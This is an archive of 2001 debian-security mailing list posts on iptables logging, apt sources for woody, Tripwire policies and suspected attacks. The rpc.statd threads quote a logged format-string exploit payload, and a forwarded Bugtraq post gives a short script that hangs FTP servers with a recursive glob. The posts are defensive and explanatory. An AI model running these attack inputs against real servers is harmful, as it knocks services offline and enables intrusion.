Re: configuring iptables logging

2001-08-21 Thread Joerg Wendland

On Sat, Aug 18, 2001 at 04:59:28PM -0500, JonesMB wrote:
 Is it possible to get rid of the MAC address and the field that follows 
 it.  All I would like to see is the source and destination IP address and 
 the information after it.  I haven't been able to find any info on the net 
 on how to do this.  All I can think of is modifying the kernel (netfilter) 
 source file but that doesn't seem like a good idea.

Why don't you simply use

cut -f-4,6- -d' '  logfile

? Sometimes the hardware address can be interesting.

Cheers, Joerg

-- 
  \ Joerg Wendland \ systems / network administrator, ITSec, Scan Plus GmbH
   \  *joergland*   \ Moerikestrasse 5, 89077 Ulm, Germany
\\ fon +49-731-92013-21, fax +49-731-6027146
 \\ PGP-key: finger [EMAIL PROTECTED]
  \ key fingerprint: 79C0 7671 AFC7 315E 657A  F318 57A3 7FBD 51CF 8417

 PGP signature


Re: apt sources.list

2001-08-21 Thread Mike Renfro

On Tue, Aug 21, 2001 at 09:36:02AM -0700, Jeff Coppock wrote:

Can I get a few recommendations on the proper sources.list for a
system running woody, that includes the security updates?

Woody would be my last choice for a automagically secure installation:

* it gets no packages of any kind that haven't been in unstable for 2
  weeks with no release-critical bugs. Security fixes are not an exception
  to this rule.

* most of the packages in security.debian.org have nearly identical
  versions to potato -- Debian tends not to upgrade versions to fix
  bugs, but instead backports patches into the current potato versions.
  This means that apt-get upgrade (or dist-upgrade) will tend to
  ignore security packages, since you'll already have a newer version
  installed. apt-get upgrade doesn't check dates, changelogs, or
  anything but the literal numeric version number.

Running stable+security.debian.org is really the only *easy* solution,
followed by running testing+(selected packages from unstable with
security updates and probably other changes, too), and lastly by
running fully unstable. Ok, those last two don't qualify as easy to me
at all.

For me, it's not even a question -- you want security, you run stable
and keep security.debian.org in your sources.list.

-- 
Mike Renfro  / RD Engineer, Center for Manufacturing Research,
931 372-3601 / Tennessee Technological University -- [EMAIL PROTECTED]


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]




Re: apt sources.list

2001-08-21 Thread Jeff Coppock

Mike Renfro, 2001-Aug-21 14:40 -0500:
 On Tue, Aug 21, 2001 at 09:36:02AM -0700, Jeff Coppock wrote:
 
 Can I get a few recommendations on the proper sources.list for a
 system running woody, that includes the security updates?
 
 Woody would be my last choice for a automagically secure installation:
 
 * it gets no packages of any kind that haven't been in unstable for 2
   weeks with no release-critical bugs. Security fixes are not an exception
   to this rule.
 
 * most of the packages in security.debian.org have nearly identical
   versions to potato -- Debian tends not to upgrade versions to fix
   bugs, but instead backports patches into the current potato versions.
   This means that apt-get upgrade (or dist-upgrade) will tend to
   ignore security packages, since you'll already have a newer version
   installed. apt-get upgrade doesn't check dates, changelogs, or
   anything but the literal numeric version number.
 
 Running stable+security.debian.org is really the only *easy* solution,
 followed by running testing+(selected packages from unstable with
 security updates and probably other changes, too), and lastly by
 running fully unstable. Ok, those last two don't qualify as easy to me
 at all.
 
 For me, it's not even a question -- you want security, you run stable
 and keep security.debian.org in your sources.list.
 
 -- 
 Mike Renfro  / RD Engineer, Center for Manufacturing Research,
 931 372-3601 / Tennessee Technological University -- [EMAIL PROTECTED]
 
 
 -- 
 To UNSUBSCRIBE, email to [EMAIL PROTECTED]
 with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
 

   Thanks for this explanation.  I see what you mean, if I want
   security updates.  
   
   I feel a bit stuck with woody though, since I want to use
   iptables instead of ipchains.  I think I'll remove the
   security source until I figure out a better way.
   
   thanks,
   jc

-- 

Jeff CoppockNortel Networks
Systems Engineerhttp://nortelnetworks.com
Major Accts.Santa Clara, CA


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]




Re: rpc.statd being attacked?

2001-08-21 Thread kath

I think this is an 800 year old Red Hat exploit, so probably no worries.

No need to worry, but any rpc services are lousy to have running anyway.

- k

- Original Message -
From: Daniel Schepler [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Tuesday, August 21, 2001 4:28 PM
Subject: rpc.statd being attacked?


 I've gotten logs several times that read something like

 Aug 20 19:20:24 adsl-63-193-247-253 rpc.statd[330]: gethostbyname error
for ^X

F7FFBF^XF7FFBF^YF7FFBF^YF7FFBF^ZF7FFBF^ZF7F
F

BF^[F7FFBF^[F7FFBF%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10
x%n%

192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\2

20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\2

20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\2

20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\2

20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\2

20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\2

20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\2

20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\2

20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\2

20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\2

20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20

 (This is at least the way it reads in less.)  For now I've just shut
 down the rpc.statd daemon, but I was wondering if this is a known
 attack.
 --
 Daniel Schepler  Please don't disillusion me.  I
 [EMAIL PROTECTED]haven't had breakfast yet.
  -- Orson Scott Card


 --
 To UNSUBSCRIBE, email to [EMAIL PROTECTED]
 with a subject of unsubscribe. Trouble? Contact
[EMAIL PROTECTED]



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]




Re: rpc.statd being attacked?

2001-08-21 Thread Daniel Jacobowitz

On Tue, Aug 21, 2001 at 01:28:24PM -0700, Daniel Schepler wrote:
 I've gotten logs several times that read something like
 
 Aug 20 19:20:24 adsl-63-193-247-253 rpc.statd[330]: gethostbyname error for ^X
 F7FFBF^XF7FFBF^YF7FFBF^YF7FFBF^ZF7FFBF^ZF7FF
 BF^[F7FFBF^[F7FFBF%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%

You're safe.  It was fixed before potato; it would not have been logged
if it had succeeded.

-- 
Daniel Jacobowitz   Carnegie Mellon University
MontaVista Software Debian GNU/Linux Developer


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]




Re: apt sources.list

2001-08-21 Thread Daniel Jacobowitz

On Tue, Aug 21, 2001 at 09:36:02AM -0700, Jeff Coppock wrote:
Can I get a few recommendations on the proper sources.list for
a system running woody, that includes the security updates?  I
recently did an apt-get update  apt-get upgrade and the
security updates cause dependancy issues that I couldn't
recover from and made my system unbootable, since lilo was
involved.  I'm scared to death to run another update/upgrade
since I had to rebuild the system from scratch!

As others have said - don't do this :)

If security is especially important to you, run stable with security
updates, or track unstable daily and hope maintainers are responsive. 
We try to see that woody is in coherent shape just before release, but
we can't supply fixes for it on any more urgent basis.  It moves too
fast.

-- 
Daniel Jacobowitz   Carnegie Mellon University
MontaVista Software Debian GNU/Linux Developer


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]




Re: configuring iptables logging

2001-08-21 Thread Joerg Wendland
On Sat, Aug 18, 2001 at 04:59:28PM -0500, JonesMB wrote:
 Is it possible to get rid of the MAC address and the field that follows 
 it.  All I would like to see is the source and destination IP address and 
 the information after it.  I haven't been able to find any info on the net 
 on how to do this.  All I can think of is modifying the kernel (netfilter) 
 source file but that doesn't seem like a good idea.

Why don't you simply use

cut -f-4,6- -d' '  logfile

? Sometimes the hardware address can be interesting.

Cheers, Joerg

-- 
  \ Joerg Wendland \ systems / network administrator, ITSec, Scan Plus GmbH
   \  *joergland*   \ Moerikestrasse 5, 89077 Ulm, Germany
\\ fon +49-731-92013-21, fax +49-731-6027146
 \\ PGP-key: finger [EMAIL PROTECTED]
  \ key fingerprint: 79C0 7671 AFC7 315E 657A  F318 57A3 7FBD 51CF 8417


pgpUPtdBd7ao2.pgp
Description: PGP signature


FHS + Debian Tripwire policy file

2001-08-21 Thread Erik Rossen
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

I am in the process of designing a Tripwire 2.3 policy file that is based
on the FHS plus annexes for GNU/Linux and Debian's distribution of it.  I
don't like the current policy file which is just a list of all of the
Debian Important-level package files - it complains too much about
missing files when one does not have a standard setup and it is really
too detailed (= long to read) in the wrong places.  In addition, it does
not check some Debian-specific stuff like the contents of /var/lib/dpkg.

My goal is that the system will be sufficiently modular that one can just
patch in a few tiny distribution-specific changes and have a nice policy
for any FHS-compliant system.  I am trying to limit references to
individual files to the absolute minimum and instead address whole
directories at a time.  Hopefully, this will result is a shorter, yet more
thorough policy that never causes a complaint except when there has been a
real unauthorised change.

Eventually I also plan to write a script that will automatically check off
files that have been changed by dpkg and reported by Tripwire, perhaps
using md5sum info from the .debs.

Before I get too far, I would like to ask the question: is anyone is
working on a similar project?  Perhaps for aide or another IDS?  I've done
some Google searches for FHS and Tripwire, but except for a few off-hand
remarks, it seems that noone is working on this idea.


Erik Rossen ^GPG key ID: 2935D0B9
[EMAIL PROTECTED] /e\   Use GnuPG, see the
http://www.multimania.com/rossen   ---black helicopters.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE7gi+jY88aPik10LkRAiBEAKDVJJ28JRs9vU+d/LQKMyFru4dRCACdFcyR
muveSPk58ya0khe4tPpr6UI=
=Dx2o
-END PGP SIGNATURE-




apt sources.list

2001-08-21 Thread Jeff Coppock
   Can I get a few recommendations on the proper sources.list for
   a system running woody, that includes the security updates?  I
   recently did an apt-get update  apt-get upgrade and the
   security updates cause dependancy issues that I couldn't
   recover from and made my system unbootable, since lilo was
   involved.  I'm scared to death to run another update/upgrade
   since I had to rebuild the system from scratch!
   
   thanks,
   jc
   
-- 

Jeff CoppockNortel Networks
Systems Engineerhttp://nortelnetworks.com
Major Accts.Santa Clara, CA



Re: apt sources.list

2001-08-21 Thread Stig Brautaset
* Jeff Coppock [EMAIL PROTECTED] spake thus:
Can I get a few recommendations on the proper sources.list for
a system running woody, that includes the security updates?  I
recently did an apt-get update  apt-get upgrade and the
security updates cause dependancy issues that I couldn't
recover from and made my system unbootable, since lilo was
involved.  I'm scared to death to run another update/upgrade
since I had to rebuild the system from scratch!

I think that running dist-upgrade instead of merely upgrade will be a
good idea with woody/sid. I am not sure that it may have caused your
trouble however, there are probably more knowledgable people on the list
that can answer that though.


Regards, Stig
-- 
www.brautaset.org



Re: apt sources.list

2001-08-21 Thread Mike Renfro
On Tue, Aug 21, 2001 at 09:36:02AM -0700, Jeff Coppock wrote:

Can I get a few recommendations on the proper sources.list for a
system running woody, that includes the security updates?

Woody would be my last choice for a automagically secure installation:

* it gets no packages of any kind that haven't been in unstable for 2
  weeks with no release-critical bugs. Security fixes are not an exception
  to this rule.

* most of the packages in security.debian.org have nearly identical
  versions to potato -- Debian tends not to upgrade versions to fix
  bugs, but instead backports patches into the current potato versions.
  This means that apt-get upgrade (or dist-upgrade) will tend to
  ignore security packages, since you'll already have a newer version
  installed. apt-get upgrade doesn't check dates, changelogs, or
  anything but the literal numeric version number.

Running stable+security.debian.org is really the only *easy* solution,
followed by running testing+(selected packages from unstable with
security updates and probably other changes, too), and lastly by
running fully unstable. Ok, those last two don't qualify as easy to me
at all.

For me, it's not even a question -- you want security, you run stable
and keep security.debian.org in your sources.list.

-- 
Mike Renfro  / RD Engineer, Center for Manufacturing Research,
931 372-3601 / Tennessee Technological University -- [EMAIL PROTECTED]



Re: apt sources.list

2001-08-21 Thread Jeff Coppock
Mike Renfro, 2001-Aug-21 14:40 -0500:
 On Tue, Aug 21, 2001 at 09:36:02AM -0700, Jeff Coppock wrote:
 
 Can I get a few recommendations on the proper sources.list for a
 system running woody, that includes the security updates?
 
 Woody would be my last choice for a automagically secure installation:
 
 * it gets no packages of any kind that haven't been in unstable for 2
   weeks with no release-critical bugs. Security fixes are not an exception
   to this rule.
 
 * most of the packages in security.debian.org have nearly identical
   versions to potato -- Debian tends not to upgrade versions to fix
   bugs, but instead backports patches into the current potato versions.
   This means that apt-get upgrade (or dist-upgrade) will tend to
   ignore security packages, since you'll already have a newer version
   installed. apt-get upgrade doesn't check dates, changelogs, or
   anything but the literal numeric version number.
 
 Running stable+security.debian.org is really the only *easy* solution,
 followed by running testing+(selected packages from unstable with
 security updates and probably other changes, too), and lastly by
 running fully unstable. Ok, those last two don't qualify as easy to me
 at all.
 
 For me, it's not even a question -- you want security, you run stable
 and keep security.debian.org in your sources.list.
 
 -- 
 Mike Renfro  / RD Engineer, Center for Manufacturing Research,
 931 372-3601 / Tennessee Technological University -- [EMAIL PROTECTED]
 
 
 -- 
 To UNSUBSCRIBE, email to [EMAIL PROTECTED]
 with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
 

   Thanks for this explanation.  I see what you mean, if I want
   security updates.  
   
   I feel a bit stuck with woody though, since I want to use
   iptables instead of ipchains.  I think I'll remove the
   security source until I figure out a better way.
   
   thanks,
   jc

-- 

Jeff CoppockNortel Networks
Systems Engineerhttp://nortelnetworks.com
Major Accts.Santa Clara, CA



rpc.statd being attacked?

2001-08-21 Thread Daniel Schepler
I've gotten logs several times that read something like

Aug 20 19:20:24 adsl-63-193-247-253 rpc.statd[330]: gethostbyname error for ^X
F7FFBF^XF7FFBF^YF7FFBF^YF7FFBF^ZF7FFBF^ZF7FF
BF^[F7FFBF^[F7FFBF%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%
192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220

(This is at least the way it reads in less.)  For now I've just shut
down the rpc.statd daemon, but I was wondering if this is a known
attack.
-- 
Daniel Schepler  Please don't disillusion me.  I
[EMAIL PROTECTED]haven't had breakfast yet.
 -- Orson Scott Card



Re: apt sources.list

2001-08-21 Thread Hubert Chan
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 Jeff == Jeff Coppock [EMAIL PROTECTED] writes:

JeffI feel a bit stuck with woody though, since I want to use
Jeff iptables instead of ipchains.  I think I'll remove the security
Jeff source until I figure out a better way.

Adrian Bunk has all that you need for kernel 2.4.x on Potato (including
iptables):
http://people.debian.org/~bunk/debian/dists/potato/main/binary-i386/

- -- 
Hubert Chan [EMAIL PROTECTED] - http://www.geocities.com/hubertchan/
PGP/GnuPG key: 1024D/651854DF71FDA37F
Fingerprint: 6CC5 822D 2E55 494C 81DD  6F2C 6518 54DF 71FD A37F
Key available at wwwkeys.pgp.net.   Please encrypt *all* e-mail to me.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE7gsjiZRhU33H9o38RAjeKAKC8L8mOFBJ/QzKG/iMUpHJr5M4HLwCg05EI
hjb88wvLOLp4O9eObhX+uV4=
=pBxt
-END PGP SIGNATURE-



Re: apt sources.list

2001-08-21 Thread Eric N. Valor

At 01:24 PM 8/21/2001 -0700, Jeff Coppock wrote:

Mike Renfro, 2001-Aug-21 14:40 -0500:
 On Tue, Aug 21, 2001 at 09:36:02AM -0700, Jeff Coppock wrote:

 Can I get a few recommendations on the proper sources.list for a
 system running woody, that includes the security updates?

 Woody would be my last choice for a automagically secure installation:

   Thanks for this explanation.  I see what you mean, if I want
   security updates.

   I feel a bit stuck with woody though, since I want to use
   iptables instead of ipchains.  I think I'll remove the
   security source until I figure out a better way.


If you want to use IPTables, simply upgrade your kernel.  ftp.kernel.org 
and schlurp down the linux-v2.4.x of your choice (I'm using 2.4.6 right 
now).  Then apt-get install iptables and you're set.




--
Eric N. Valor
Webmeister/Inetservices
Lutris Technologies
[EMAIL PROTECTED]

- This Space Intentionally Left Blank -



Re: apt sources.list

2001-08-21 Thread Steven James
Greetings,

A better solution might be to install Potato, then recompile the src debs from 
woody for the few packages that you actually need.

G'day,
sjames


Quoting Jeff Coppock [EMAIL PROTECTED]:

 Mike Renfro, 2001-Aug-21 14:40 -0500:
  On Tue, Aug 21, 2001 at 09:36:02AM -0700, Jeff Coppock wrote:
  
  Can I get a few recommendations on the proper sources.list for a
  system running woody, that includes the security updates?
  
  Woody would be my last choice for a automagically secure
 installation:
  
  * it gets no packages of any kind that haven't been in unstable for
 2
weeks with no release-critical bugs. Security fixes are not an
 exception
to this rule.
  
  * most of the packages in security.debian.org have nearly identical
versions to potato -- Debian tends not to upgrade versions to fix
bugs, but instead backports patches into the current potato
 versions.
This means that apt-get upgrade (or dist-upgrade) will tend to
ignore security packages, since you'll already have a newer version
installed. apt-get upgrade doesn't check dates, changelogs, or
anything but the literal numeric version number.
  
  Running stable+security.debian.org is really the only *easy*
 solution,
  followed by running testing+(selected packages from unstable with
  security updates and probably other changes, too), and lastly by
  running fully unstable. Ok, those last two don't qualify as easy to
 me
  at all.
  
  For me, it's not even a question -- you want security, you run stable
  and keep security.debian.org in your sources.list.
  
  -- 
  Mike Renfro  / RD Engineer, Center for Manufacturing Research,
  931 372-3601 / Tennessee Technological University --
 [EMAIL PROTECTED]
  
  
  -- 
  To UNSUBSCRIBE, email to [EMAIL PROTECTED]
  with a subject of unsubscribe. Trouble? Contact
 [EMAIL PROTECTED]
  
 
Thanks for this explanation.  I see what you mean, if I want
security updates.  

I feel a bit stuck with woody though, since I want to use
iptables instead of ipchains.  I think I'll remove the
security source until I figure out a better way.

thanks,
jc
 
 -- 
 
 Jeff Coppock  Nortel Networks
 Systems Engineer  http://nortelnetworks.com
 Major Accts.  Santa Clara, CA
 
 
 -- 
 To UNSUBSCRIBE, email to [EMAIL PROTECTED]
 with a subject of unsubscribe. Trouble? Contact
 [EMAIL PROTECTED]
 



-steven james, director of research, linux labs
LinuxBIOS Cluster Solutions 230 peachtree st nw ste 701
High-Speed Colocation, Hosting, atlanta.ga.us 30303
Web Design, Linux Hardware,http://www.linuxlabs.com
Development  Support Since 1995  404.577.7747 fax 404.577.7743
---



Re: rpc.statd being attacked?

2001-08-21 Thread kath
I think this is an 800 year old Red Hat exploit, so probably no worries.

No need to worry, but any rpc services are lousy to have running anyway.

- k

- Original Message -
From: Daniel Schepler [EMAIL PROTECTED]
To: debian-security@lists.debian.org
Sent: Tuesday, August 21, 2001 4:28 PM
Subject: rpc.statd being attacked?


 I've gotten logs several times that read something like

 Aug 20 19:20:24 adsl-63-193-247-253 rpc.statd[330]: gethostbyname error
for ^X

F7FFBF^XF7FFBF^YF7FFBF^YF7FFBF^ZF7FFBF^ZF7F
F

BF^[F7FFBF^[F7FFBF%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10
x%n%

192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\2

20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\2

20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\2

20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\2

20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\2

20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\2

20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\2

20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\2

20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\2

20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\2

20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20

 (This is at least the way it reads in less.)  For now I've just shut
 down the rpc.statd daemon, but I was wondering if this is a known
 attack.
 --
 Daniel Schepler  Please don't disillusion me.  I
 [EMAIL PROTECTED]haven't had breakfast yet.
  -- Orson Scott Card


 --
 To UNSUBSCRIBE, email to [EMAIL PROTECTED]
 with a subject of unsubscribe. Trouble? Contact
[EMAIL PROTECTED]




Fwd: [bugtraq@securityfocus.com] Multiple-Vendor-FTP-Vuln. (old?)

2001-08-21 Thread A . Didit Mifanto
I'm using proftpd 1.2.0pre10-2.0potato1, tried this vulnerability, and still 
affects to this version of proftpd.
I see that  ftp://ftp.debian.org is still using this version, and I think also 
affected.

Thanks

Didit




--- Start of forwarded message ---
From: Enrico Kern [EMAIL PROTECTED]
To: bugtraq@securityfocus.com
Organization: http://freemail.web.de/
Subject: Multiple-Vendor-FTP-Vuln. (old?)
Date: 8/20/01 20:20:35

Hi,

i tested an old proftpd bug (ls /../*/../*/../*/../*/../*/../*/../*) on =
many new Linux-Dist.. When a user logged in in ftp and type
the ls command the in.ftpd takes over 90 percent cpu-usage and execute =
the command 2 or 3x than the full system hang up. it also works in =
console. I wonder that is not fixed. THIS BUG IS OLD. POSTED ON BUGTRAQ  =
in march 01, but
it still works so i post it again.

affected:

RedHat Linux 7.x
Linux Mandrake 8.0
SuSE Linux 7.2
FreeBSD 4.3
AiX V 4.3
other?


Not vuln.:

latest Wu-Ftpd
Windows FTP-Server


Exploit:

#!/bin/bash=20
ftp -n FTP-SERVER\end=20
quot user anonymous
bin
quot pass [EMAIL PROTECTED]
ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
bye=20
end=20

Fix:

set cpu-limit for your anonymous user.

 End of forwarded message 





Re: rpc.statd being attacked?

2001-08-21 Thread Daniel Jacobowitz
On Tue, Aug 21, 2001 at 01:28:24PM -0700, Daniel Schepler wrote:
 I've gotten logs several times that read something like
 
 Aug 20 19:20:24 adsl-63-193-247-253 rpc.statd[330]: gethostbyname error for ^X
 F7FFBF^XF7FFBF^YF7FFBF^YF7FFBF^ZF7FFBF^ZF7FF
 BF^[F7FFBF^[F7FFBF%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%

You're safe.  It was fixed before potato; it would not have been logged
if it had succeeded.

-- 
Daniel Jacobowitz   Carnegie Mellon University
MontaVista Software Debian GNU/Linux Developer



Re: apt sources.list

2001-08-21 Thread Daniel Jacobowitz
On Tue, Aug 21, 2001 at 09:36:02AM -0700, Jeff Coppock wrote:
Can I get a few recommendations on the proper sources.list for
a system running woody, that includes the security updates?  I
recently did an apt-get update  apt-get upgrade and the
security updates cause dependancy issues that I couldn't
recover from and made my system unbootable, since lilo was
involved.  I'm scared to death to run another update/upgrade
since I had to rebuild the system from scratch!

As others have said - don't do this :)

If security is especially important to you, run stable with security
updates, or track unstable daily and hope maintainers are responsive. 
We try to see that woody is in coherent shape just before release, but
we can't supply fixes for it on any more urgent basis.  It moves too
fast.

-- 
Daniel Jacobowitz   Carnegie Mellon University
MontaVista Software Debian GNU/Linux Developer